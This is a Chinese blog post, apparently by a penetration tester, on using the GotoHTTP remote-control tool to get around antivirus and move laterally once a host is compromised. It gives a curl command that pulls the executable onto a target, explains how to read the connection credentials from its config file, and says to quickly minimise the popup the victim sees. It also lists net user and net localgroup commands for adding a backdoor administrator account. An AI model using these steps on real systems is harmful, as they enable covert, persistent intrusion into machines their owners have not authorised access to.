无视杀软远控工具GotoHTTP
本文最后更新于521 天前,其中的信息可能已经过时

在有杀软拦截,CS无法上线的情况下,经常用到todesk和向日葵这两个远控工具进行横向移动。不过这两个工具现在好像不怎么好用了。不过无所谓,用其他的就是了,听说最近GotoHTTP很火,可以试试看。

GoToHTTP的优点和缺点

优点:

  • B2C模式,无需安装控制端软件,有浏览器就可以远控。
  • 流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
  • 在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。
  • 被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。

缺点:

  • 需要管理员权限运行
  • 一些行为(网络唤醒远程主机)需要加载驱动,导致运行时360安全卫士会拦截这行为,其他杀软则不会拦截。

GoToHTTP下载

官网下载:http://www.gotohttp.com/goto/download.12x

win32or64网盘下载:点我下载

GoToHTTP提供了多种系统的被控端,可以根据情况选用。

GoToHTTP使用

上传GotoHTTP.exe

tip:如果目标机有curl命令

curl -o GotoHTTP.exe https://www.wangpan.com/GotoHTTP.exe

执行GotoHTTP.exe

成功生成gotohttp.ini配置文件

读取配置文件的连接信息

打开在线连接网站:https://sh2.gotohttp.com/

输入电脑ID(name)和控制码(tmp)连接

成功连接

注:成功连接后目标机会自动出现这个弹窗,手速要快,把它最小化

总结:

GotoHTTP可以成功绕过免杀进行远控但是需要的前提是有命令执行和文件上传功能

命令下载文件的话需要目标机器上面装有curl(应该还有其他方法)

而且连接成功后如果目标机器锁屏的话那也还是进不去桌面的

解决方法->创建一个用户

net user <username> <password> /add

添加XX到管理员账户

net loaclgroup administrators <username> /add

参考文章:

https://mp.weixin.qq.com/s/Tnt3VjsAPb5LP5QVoPyizA

如果觉得本文对您有所帮助,可以支持下博主,一分也是缘😊
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇